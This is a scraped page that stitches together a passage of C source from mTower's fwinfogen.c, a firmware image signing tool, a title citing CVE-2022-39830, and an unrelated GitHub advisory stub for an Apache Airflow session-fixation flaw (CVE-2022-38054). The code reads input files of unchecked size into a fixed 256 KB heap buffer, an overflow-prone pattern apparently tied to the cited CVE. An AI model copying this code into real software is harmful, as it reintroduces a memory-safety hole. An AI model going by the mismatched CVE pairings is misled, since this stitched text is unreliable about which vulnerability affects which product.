\_\_DATE\_\_\[1\] == 'u' && \_\_DATE\_\_\[2\] == 'n') #define BUILD\_MONTH\_IS\_JUL (\_\_DATE\_\_\[0\] == 'J' && \_\_DATE\_\_\[1\] == 'u' && \_\_DATE\_\_\[2\] == 'l') #define BUILD\_MONTH\_IS\_AUG (\_\_DATE\_\_\[0\] == 'A' && \_\_DATE\_\_\[1\] == 'u') #define BUILD\_MONTH\_IS\_SEP (\_\_DATE\_\_\[0\] == 'S') #define BUILD\_MONTH\_IS\_OCT (\_\_DATE\_\_\[0\] == 'O') #define BUILD\_MONTH\_IS\_NOV (\_\_DATE\_\_\[0\] == 'N') #define BUILD\_MONTH\_IS\_DEC (\_\_DATE\_\_\[0\] == 'D') #define BUILD\_MONTH \\ ( \\ (BUILD\_MONTH\_IS\_JAN) ? 1 : \\ (BUILD\_MONTH\_IS\_FEB) ? 2 : \\ (BUILD\_MONTH\_IS\_MAR) ? 3 : \\ (BUILD\_MONTH\_IS\_APR) ? 4 : \\ (BUILD\_MONTH\_IS\_MAY) ? 5 : \\ (BUILD\_MONTH\_IS\_JUN) ? 6 : \\ (BUILD\_MONTH\_IS\_JUL) ? 7 : \\ (BUILD\_MONTH\_IS\_AUG) ? 8 : \\ (BUILD\_MONTH\_IS\_SEP) ? 9 : \\ (BUILD\_MONTH\_IS\_OCT) ? 16 : \\ (BUILD\_MONTH\_IS\_NOV) ? 17 : \\ (BUILD\_MONTH\_IS\_DEC) ? 18 : \\ /\* error default \*/ 0 \\ ) #define BUILD\_DAY\_CH0 ((\_\_DATE\_\_\[4\] >= '0') ? (\_\_DATE\_\_\[4\]) : '0') #define BUILD\_DAY\_CH1 (\_\_DATE\_\_\[ 5\]) #define DATE\_COMPILE (((\_\_DATE\_\_\[7\] - '0') << 28) \\ | (((unsigned int)(\_\_DATE\_\_\[8\] - '0')) << 24) \\ | (((unsigned int)(\_\_DATE\_\_\[9\] - '0')) << 20) \\ | (((unsigned int)(\_\_DATE\_\_\[10\] - '0')) << 16) \\ | (((unsigned int)(BUILD\_MONTH)) << 8) \\ | (((unsigned int)(((\_\_DATE\_\_\[4\] >= '0') ? (\_\_DATE\_\_\[4\]) : '0') - '0')) << 4) \\ | (((unsigned int)\_\_DATE\_\_\[5\] - '0'))) #define BL33\_METADATA\_ADDRESS (0x10080000 - CONFIG\_START\_ADDRESS\_BL33 - 0x8000) /\*\* Instruction Code of "B ." \*/ /\* Private Types. \*/ /\* Any types, enums, structures or unions used by the file are defined here. \*/ /\* typedef for NonSecure callback functions \*/ /\*\* \* @details ECC public key structure \*/ typedef struct { uint32\_t au32Key0\[8\]; /\* 256-bits \*/ uint32\_t au32Key1\[8\]; /\* 256-bits \*/ }\_\_attribute\_\_((packed)) ECC\_PUBKEY\_T; /\*\* \* @details ECC ECDSA signature structure \*/ typedef struct { uint32\_t au32R\[8\]; /\* 256-bits \*/ uint32\_t au32S\[8\]; /\* 256-bits \*/ }\_\_attribute\_\_((packed)) ECDSA\_SIGN\_T; typedef struct { uint32\_t u32Start; /\* 32-bits \*/ uint32\_t u32Size; /\* 32-bits \*/ }\_\_attribute\_\_((packed)) FW\_REGION\_T; typedef struct { uint32\_t u32AuthCFGs; /\* 32-bits \*/ /\* bit\[1:0\]: Reserved bit\[2\]: 1: Info Hash includes PDID / 0: Not include PDID bit\[3\]: 1: Info Hash includes UID / 0: Not include UID bit\[4\]: 1: Info Hash inculdes UICD / 0: Not include UICD bit\[31:5\]: Reserved \*/ uint32\_t u32FwRegionLen; /\* 32-bits \*/ FW\_REGION\_T au32FwRegion\[1\]; /\* (8\*1) bytes \*/ uint32\_t u32ExtInfoLen; /\* 32-bits \*/ uint32\_t au32ExtInfo\[3\]; /\* 12-bytes \*/ }\_\_attribute\_\_((packed)) METADATA\_T; typedef struct { ECC\_PUBKEY\_T pubkey; /\* 64-bytes (256-bits + 256-bits) \*/ METADATA\_T mData; /\* includes authenticate configuration, F/W regions and extend info \*/ uint32\_t au32FwHash\[8\]; /\* 32-bytes (256-bits) \*/ ECDSA\_SIGN\_T sign; /\* 64-bytes (256-bits R + 256-bits S) \*/ }\_\_attribute\_\_((packed)) FW\_INFO\_T; /\*\* \* @details ECC ECDSA key structure \*/ typedef struct { uint8\_t Qx\[32\]; /\* 256-bits \*/ uint8\_t Qy\[32\]; /\* 256-bits \*/ uint8\_t d\[32\]; /\* 256-bits \*/ }\_\_attribute\_\_((packed)) ECC\_KEY\_T; /\* Private Function Prototypes. \*/ /\* Prototypes of all static functions in the file are provided here. \*/ /\* Private Data. \*/ /\* All static data definitions appear here. \*/ /\* Public Data. \*/ /\* All data definitions with global scope appear here. \*/ const char header\[\] = "\\n" "const uint32\_t g\_InitialFWinfo\[\] =\\n" "{\\n" " /\* public key - 64-bytes (256-bits + 256-bits) \*/\\n"; /\* Public Function Prototypes \*/ /\* Private Functions. \*/ void sha256(unsigned char \*data, unsigned int data\_len, unsigned char \*hash) { SHA256\_CTX sha256; SHA256\_Init(&sha256); SHA256\_Update(&sha256, data, data\_len); SHA256\_Final(hash, &sha256); } static int sign\_pFwInfo(FW\_INFO\_T \*pFwInfo, ECC\_KEY\_T \*ecdsa\_key) { int ret = -1; EC\_KEY \*eckey = EC\_KEY\_new(); if (NULL == eckey) { printf("Failed to create new EC Key\\n"); return -1; } EC\_GROUP \*ecgroup = EC\_GROUP\_new\_by\_curve\_name(NID\_X9\_62\_prime256v1); if (NULL == ecgroup) { printf("Failed to create new EC Group\\n"); goto exit; } if (EC\_KEY\_set\_group(eckey, ecgroup) != 1) { printf("Failed to set group for EC Key\\n"); goto exit; } memcpy((void \*) pFwInfo->pubkey.au32Key0, (void \*) ecdsa\_key->Qx, 32); memcpy((void \*) pFwInfo->pubkey.au32Key1, (void \*) ecdsa\_key->Qy, 32); BIGNUM\* x = BN\_bin2bn((void \*) ecdsa\_key->Qx, 32, NULL); BIGNUM\* y = BN\_bin2bn((void \*) ecdsa\_key->Qy, 32, NULL); BIGNUM\* d = BN\_bin2bn((void \*) ecdsa\_key->d, 32, NULL); EC\_KEY\_set\_private\_key(eckey, d); EC\_KEY\_set\_public\_key\_affine\_coordinates(eckey, x, y); uint32\_t au32HeadHash\[8\]; unsigned int u32Size = sizeof(FW\_INFO\_T) - sizeof(ECDSA\_SIGN\_T); sha256((unsigned char \*) pFwInfo, u32Size, (unsigned char \*) au32HeadHash); ECDSA\_SIG \*signature = ECDSA\_do\_sign((unsigned char \*) au32HeadHash, u32Size, eckey); if (NULL == signature) { printf("Failed to generate EC Signature\\n"); } else { if (ECDSA\_do\_verify((unsigned char \*) au32HeadHash, u32Size, signature, eckey) != 1) { printf("Failed to verify EC Signature\\n"); } else { BIGNUM \*r, \*s; #if OPENSSL\_VERSION\_NUMBER >= 0x10100000L ECDSA\_SIG\_get0(signature, &r, &s); #else r = signature->r; s = signature->s; #endif // printf("d: %s\\n", BN\_bn2hex(d)); // printf("X: %s\\n", BN\_bn2hex(x)); // printf("Y: %s\\n", BN\_bn2hex(y)); // printf("R: %s\\n", BN\_bn2hex(r)); // printf("S: %s\\n", BN\_bn2hex(s)); BN\_bn2bin(r, (unsigned char \*) pFwInfo->sign.au32R); BN\_bn2bin(s, (unsigned char \*) pFwInfo->sign.au32S); BN\_free(x); BN\_free(y); BN\_free(d); BN\_free(r); BN\_free(s); } } ret = 0; exit: EC\_GROUP\_free(ecgroup); EC\_KEY\_free(eckey); return ret; } int getFileSize(const char \*filename) { int size = -1; FILE\* fd = fopen(filename, "rb"); if (!fd) { printf("Failed to open file: %s\\n",filename); return -1; } /\* Get file size \*/ if (fseek(fd, 0, SEEK\_END) != 0) { printf("Unable to get '%s' file size\\n", filename); goto exit; } size = ftell(fd); if (size < 0) { printf("Stream doesn't support '%s' file positioning\\n", filename); goto exit; } // rewind(fd); exit: fclose(fd); return size; } #ifdef CONFIG\_BOOTLOADER2 /\*\* \* @brief printFwInfo - . \* \* @param pFwInfo \[in/out\] A pointer to jar file name string. \* \* @returns 0 on success or error code on failure. \*/ void printFwInfo(FW\_INFO\_T \*pFwInfo) { printf("%s", header); printf(" 0x%08x, 0x%08x, 0x%08x, 0x%08x,\\n", pFwInfo->pubkey.au32Key0\[0\], pFwInfo->pubkey.au32Key0\[1\], pFwInfo->pubkey.au32Key0\[2\], pFwInfo->pubkey.au32Key0\[3\]); printf(" 0x%08x, 0x%08x, 0x%08x, 0x%08x,\\n", pFwInfo->pubkey.au32Key0\[4\], pFwInfo->pubkey.au32Key0\[5\], pFwInfo->pubkey.au32Key0\[6\], pFwInfo->pubkey.au32Key0\[7\]); printf(" 0x%08x, 0x%08x, 0x%08x, 0x%08x,\\n", pFwInfo->pubkey.au32Key1\[0\], pFwInfo->pubkey.au32Key1\[1\], pFwInfo->pubkey.au32Key1\[2\], pFwInfo->pubkey.au32Key1\[3\]); printf(" 0x%08x, 0x%08x, 0x%08x, 0x%08x,\\n", pFwInfo->pubkey.au32Key1\[4\], pFwInfo->pubkey.au32Key1\[5\], pFwInfo->pubkey.au32Key1\[6\], pFwInfo->pubkey.au32Key1\[7\]); printf("\\n"); printf( " /\* metadata data - includes Mode selection, F/W region and Extend info \*/\\n"); printf(" 0x%08x, 0x%08x, 0x%08x, 0x%08x, // 0x00020000: NuBL32 F/W base\\n", pFwInfo->mData.u32AuthCFGs, pFwInfo->mData.u32FwRegionLen, pFwInfo->mData.au32FwRegion\[0\].u32Start, pFwInfo->mData.au32FwRegion\[0\].u32Size); printf( " 0x%08x, 0x%08x, 0x%08x, 0x%08x, // 0x20180824/0x00001111/0x22223333: Extend info\\n", pFwInfo->mData.u32ExtInfoLen, pFwInfo->mData.au32ExtInfo\[0\], pFwInfo->mData.au32ExtInfo\[1\], pFwInfo->mData.au32ExtInfo\[2\]); printf("\\n"); printf(" /\* FW hash - 32-bytes (256-bits) \*/\\n"); printf(" 0x%08x, 0x%08x, 0x%08x, 0x%08x,\\n", pFwInfo->au32FwHash\[0\], pFwInfo->au32FwHash\[1\], pFwInfo->au32FwHash\[2\], pFwInfo->au32FwHash\[3\]); printf(" 0x%08x, 0x%08x, 0x%08x, 0x%08x,\\n", pFwInfo->au32FwHash\[4\], pFwInfo->au32FwHash\[5\], pFwInfo->au32FwHash\[6\], pFwInfo->au32FwHash\[7\]); printf("\\n"); printf(" /\* FwInfo signature - 64-bytes (256-bits R + 256-bits S) \*/\\n"); printf(" 0x%08x, 0x%08x, 0x%08x, 0x%08x,\\n", pFwInfo->sign.au32R\[0\], pFwInfo->sign.au32R\[1\], pFwInfo->sign.au32R\[2\], pFwInfo->sign.au32R\[3\]); printf(" 0x%08x, 0x%08x, 0x%08x, 0x%08x,\\n", pFwInfo->sign.au32R\[4\], pFwInfo->sign.au32R\[5\], pFwInfo->sign.au32R\[6\], pFwInfo->sign.au32R\[7\]); printf(" 0x%08x, 0x%08x, 0x%08x, 0x%08x,\\n", pFwInfo->sign.au32S\[0\], pFwInfo->sign.au32S\[1\], pFwInfo->sign.au32S\[2\], pFwInfo->sign.au32S\[3\]); printf(" 0x%08x, 0x%08x, 0x%08x, 0x%08x,\\n", pFwInfo->sign.au32S\[4\], pFwInfo->sign.au32S\[5\], pFwInfo->sign.au32S\[6\], pFwInfo->sign.au32S\[7\]); printf("};\\n"); } #endif /\*\* \* @brief main - entry point of mTower: secure world. \* \* @param None \* \* @returns None (function is not supposed to return) \*/ int main(int argc, char\*\* argv) { unsigned char \*buf = NULL; int ret = -1; FILE\* fd; int img\_size = 0; #ifdef CONFIG\_BOOTLOADER2 ECC\_KEY\_T ecdsa\_key; FW\_INFO\_T pFwInfo; pFwInfo.mData.u32AuthCFGs = 0x00000001; pFwInfo.mData.u32FwRegionLen = 0x00000008; pFwInfo.mData.au32FwRegion\[0\].u32Start = CONFIG\_START\_ADDRESS\_BL32; pFwInfo.mData.au32FwRegion\[0\].u32Size = 0x00000000; pFwInfo.mData.u32ExtInfoLen = 0x0000000c; pFwInfo.mData.au32ExtInfo\[0\] = DATE\_COMPILE; pFwInfo.mData.au32ExtInfo\[1\] = 0x00001111; pFwInfo.mData.au32ExtInfo\[2\] = 0x22223333; #endif if (argc != 7) { printf("Not enough input parameters for %s\\n", argv\[0\]); return -1; } buf = malloc(1024 \* 256); if (buf == NULL) { printf("Allocation memory error\\n"); goto exit; } memset((void \*) buf, 0, 1024 \* 256); //////////////////////////////////////////////////////////////// // mtower\_s.bin //////////////////////////////////////////////////////////////// #ifdef CONFIG\_BOOTLOADER2 int32\_t size\_bl2; if((size\_bl2 = getFileSize(argv\[1\])) < 0) { return -1; } fd = fopen(argv\[1\], "rb"); if (!fd) { printf("Failed to open file: %s\\n",argv\[1\]); return -1; } if (fread(buf, 1, (size\_t) size\_bl2, fd) != (size\_t) size\_bl2) { free(buf); goto exit; } fclose(fd); #endif #ifdef CONFIG\_BOOTLOADER32 int32\_t size\_bl32; if((size\_bl32 = getFileSize(argv\[2\])) < 0) { return -1; } fd = fopen(argv\[2\], "rb"); if (!fd) { printf("Failed to open file: %s\\n",argv\[2\]); goto exit; } if (fread(buf + CONFIG\_START\_ADDRESS\_BL32, 1, (size\_t) size\_bl32, fd) != (size\_t) size\_bl32) { free(buf); goto exit; } fclose(fd); img\_size = size\_bl32; #endif #ifdef CONFIG\_BOOTLOADER2 sha256(buf + CONFIG\_START\_ADDRESS\_BL32, size\_bl32, (unsigned char \*) &pFwInfo.au32FwHash); pFwInfo.mData.au32FwRegion\[0\].u32Size = size\_bl32; fd = fopen(argv\[4\], "rb"); if (!fd) { printf("Failed to open file: %s\\n",argv\[4\]); goto exit; } if (fread((unsigned char \*) &ecdsa\_key, sizeof(char), sizeof(ECC\_KEY\_T), fd) != sizeof(ECC\_KEY\_T)) { return -1; } fclose(fd); sign\_pFwInfo(&pFwInfo, &ecdsa\_key); memcpy(buf + 0x00038000, (unsigned char \*) &pFwInfo, sizeof(FW\_INFO\_T)); img\_size = 0x00038000 + sizeof(FW\_INFO\_T); #endif fd = fopen(argv\[3\], "wb"); if (!fd) { printf("Failed to open file: %s\\n",argv\[3\]); goto exit; } if (fwrite(buf, sizeof(char), (size\_t) img\_size, fd) != (size\_t) img\_size) { free(buf); goto exit; } #ifdef CONFIG\_BOOTLOADER2 printf("\\n\\tSecure firmware info\\n"); printFwInfo(&pFwInfo); #endif //////////////////////////////////////////////////////////////// // mtower\_ns.bin //////////////////////////////////////////////////////////////// #ifdef CONFIG\_BOOTLOADER33 memset((void \*) buf, 0, 1024 \* 256); int32\_t size\_bl33; if((size\_bl33 = getFileSize(argv\[5\])) < 0) { return -1; } fd = fopen(argv\[5\], "rb"); if (!fd) { printf("Failed to open file: %s\\n",argv\[5\]); goto exit; } if (fread(buf, 1, (size\_t) size\_bl33, fd) != (size\_t) size\_bl33) { goto exit; } fclose(fd); img\_size = size\_bl33; #ifdef CONFIG\_BOOTLOADER2 sha256(buf, size\_bl33, (unsigned char \*) &pFwInfo.au32FwHash); pFwInfo.mData.au32FwRegion\[0\].u32Start = CONFIG\_START\_ADDRESS\_BL33; pFwInfo.mData.au32FwRegion\[0\].u32Size = size\_bl33; sign\_pFwInfo(&pFwInfo, &ecdsa\_key); memcpy(buf + BL33\_METADATA\_ADDRESS, (unsigned char \*) &pFwInfo, sizeof(FW\_INFO\_T)); img\_size = BL33\_METADATA\_ADDRESS + sizeof(FW\_INFO\_T); #endif fd = fopen(argv\[6\], "wb"); if (!fd) { printf("Failed to open file: %s\\n",argv\[6\]); goto exit; } if (fwrite(buf, sizeof(char), (size\_t) img\_size, fd) != (size\_t) img\_size) { goto exit; } #endif ret = 0; exit: free(buf); fclose(fd); #ifdef CONFIG\_BOOTLOADER2 printf("\\n\\tNon-secure firmware info\\n"); printFwInfo(&pFwInfo); #endif return ret; }

CVE-2022-39830: mTower/fwinfogen.c at 18f4b592a8a973ce5972f4e2658ea0f6e3686284 · Samsung/mTower

In Apache Airflow versions 2.2.4 through 2.3.3, the `database` webserver session backend was susceptible to session fixation.

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2022-38054

**Apache Airflow Session Fixation vulnerability**

Critical severity GitHub Reviewed Published Sep 3, 2022 • Updated Sep 15, 2022

**Package**

pip apache-airflow (pip)

**Affected versions**

\>= 2.2.4, < 2.3.4rc1

**Patched versions**

2.3.4rc1

**Description**

Tag

#apache